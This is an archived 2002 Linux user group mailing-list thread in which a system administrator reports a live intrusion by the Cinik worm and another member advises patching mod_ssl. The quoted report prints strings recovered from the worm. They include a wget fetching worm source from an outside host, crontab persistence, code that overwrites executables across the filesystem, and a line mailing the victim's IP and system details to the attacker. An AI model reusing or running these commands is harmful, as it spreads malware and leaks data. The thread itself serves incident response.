[ale] Under attack! (html encoding alert)
Michael Hirsch
mhirsch at nubridges.com
Tue Sep 24 10:15:50 EDT 2002
Jim,
This looks like a small variation on the wrom that got us last week. Be
sure to update the modssl package as well as the ssl package. We found
that RedHat's latest modssl package kept the worm out.
It didn't do us any real damage, so you can hope for the best. Good
luck,
Michael
On Tue, 2002-09-24 at 01:26, James P. Kinney III wrote:
> Sorry for the html, having a bit of a problem right now.
>
> I stumbled across a cracker getting into my box. May have come in
> through apache as the username on the installed app is apache. (httpd
> error log looks like openssl attack. openssl was NOT upgraded <doh!>)
> In ps, I saw :
> 21236 ? S 96:33 /tmp/.cinik 63.238.109.140
>
> Which is NOT something of mine. I was investigating a possible intrusion
> on another machine and did a ping on an IP address that someone had
> telneted in from on this clients machine. It was a live address with no
> DNS records and it suddenly went dark. A few minutes later, I noticed
> the connection lights on my DSL staying active for much longer than
> getting email. Saw the above process running on the webserver.
>
> Ran "strings" on the found worm file. Some interesting stuff from that:
>
> /usr/bin/wget http://zamfy.home.ro/0/cinik.c
> mv /tmp/cinik.c /tmp/.cinik.c
>
> echo -e 'chmod a+x $i
> echo 1 `/bin/date +%H` \* \* \* $i %s \> /dev/null 2\>\&1 | crontab'>>
> /tmp/.cinik.go
> echo '# ale altora'>> /tmp/.cinik.go
> echo 'for i in `/usr/bin/find /usr /var /tmp /home /mnt -type f -perm 7
> 2>/dev/null`'>> /tmp/.cinik.go
> echo 'do'>> /tmp/.cinik.go
> echo ' cat /tmp/.cinik > $i'>> /tmp/.cinik.go
> echo ' chmod a+x $i'>> /tmp/.cinik.go
> echo ' echo 2 `/bin/date +%H` \* \* \* $i %1 \> /dev/null 2\>\&1 |
> crontab'>> /tmp/.cinik.go
> echo 'done'>> /tmp/.cinik.go
> echo ' '>> /tmp/.cinik.go
> echo '# directoarele mele'>> /tmp/.cinik.go
> echo 'for i in `/usr/bin/find /usr /var /tmp /home /mnt -type d -uid
> $myid`'>> /tmp/.cinik.go
> echo ' cat /tmp/.cinik > $i/.cinik'>> /tmp/.cinik.go
> echo ' chmod a+x $i/.cinik'>> /tmp/.cinik.go
> echo ' echo 3 `/bin/date +%H` \* \* \* $i/.cinik %1 \> /dev/null 2\>\&1
> | crontab'>> /tmp/.cinik.go
> echo 'echo PROC > /tmp/.cinik.status'>> /tmp/.cinik.go
> echo 'cat /proc/cpuinfo >> /tmp/.cinik.status'>> /tmp/.cinik.go
> echo 'echo MEM >> /tmp/.cinik.status'>> /tmp/.cinik.go
> echo 'cat /usr/bin/free >> /tmp/.cinik.status'>> /tmp/.cinik.go
> echo 'echo HDD >> /tmp/.cinik.status'>> /tmp/.cinik.go
> echo 'cat /bin/df -h >> /tmp/.cinik.status'>> /tmp/.cinik.go
> echo 'echo IP >> /tmp/.cinik.status'>> /tmp/.cinik.go
> echo 'cat /sbin/ifconfig >> /tmp/.cinik.status'>> /tmp/.cinik.go
> echo 'myip=`/sbin/ifconfig eth0 | head -2 | tail -1 | cut -d: -f2 | cut
> -d" " -f1`'>> /tmp/.cinik.go
> echo 'mail cinik_worm at yahoo.com -s "$myip" < /tmp/cinik.status'>>
> /tmp/.cinik.go
> echo 'rm -f /tmp/cinik.status'>> /tmp/.cinik.go
> chmod a+x /tmp/.cinik.go;/tmp/.cinik.go;exit
>
>
> This was from running strings on the lastlog in /var/log:
> # strings lastlog
>
> 171.118.33.65.cfl.rr.com
>
> 1-020.adsl.cyberlink.ch
>
> But the real clincher is I caught the bastard in the act and got the
> source code intact!
>
> From the file /tmp/.cinic.c
>
> /****************************************************************************
>
> * *
> * Peer-to-peer UDP Distributed Denial of Service
> (PUD) *
> * by
> contem at efnet *
>
> * *
> * Virtually connects computers via the udp protocol on
> the *
> * specified port. Uses a newly created peer-to-peer protocol
> that *
> * incorperates uses on unstable or dead computers. The program
> is *
> * ran with the parameters of another ip on the virtual network.
> If *
> * running on the first computer, run with the ip 127.0.0.1 or
> some *
> * other type of local address.
> Ex: *
>
> * *
> * Computer A: ./program
> 127.0.0.1 *
> * Computer B: ./program
> Computer_A *
> * Computer C: ./program
> Computer_A *
> * Computer D: ./program
> Computer_C *
>
> * *
> * Any form of that will work. The linking process works
> by *
> * giving each computer the list of avaliable computers,
> then *
> * using a technique called broadcast segmentation combined with
> TCP *
> * like functionality to insure that another computer on the
> network *
> * receives the broadcast packet, segments it again and
> recreates *
> * the packet to send to other hosts. That technique can be used
> to *
> * support over 16 million simutaniously connected
> computers. *
>
> * *
> * Thanks to ensane and st for donating shells and test
> beds *
> * for this program. And for the admins who removed me because
> I *
> * was testing this program (you know who you are) need to
> watch *
> * their
> backs. *
>
> * *
> * I am not responsible for any harm caused by this
> program! *
> * I made this program to demonstrate peer-to-peer communication
> and *
> * should not be used in real life. It is an education program
> that *
> * should never even be ran at all, nor used in any way, shape
> or *
> * form. It is not the authors fault if it was used for any
> purposes *
> * other than
> educational. *
>
> * *
>
> * *
> * A FEW MODIFICATIONS MADE BY CiNIK FOR BETTER HIDING ON THE
> VICTIM *
>
> * *
>
> * *
>
> ****************************************************************************/
>
> So now I'm getting pounded by udp packets in a DOS from at least 18
> IP's.
>
> This is going to the FBI.
>
> --
> James P. Kinney III \Changing the mobile computing world/
> President and CEO \ one Linux user /
> Local Net Solutions,LLC \ at a time. /
> 770-493-8244 \.___________________________./
>
> GPG ID: 829C6CA7 James P. Kinney III (M.S. Physics)
> <jkinney at localnetsolutions.com>
> Fingerprint = 3C9E 6366 54FC A3FE BA4D 0659 6190 ADC3 829C 6CA7
>
>
---
This message has been sent through the ALE general discussion list.
See http://www.ale.org/mailing-lists.shtml for more info. Problems should be
sent to listmaster at ale dot org.
More information about the Ale
mailing list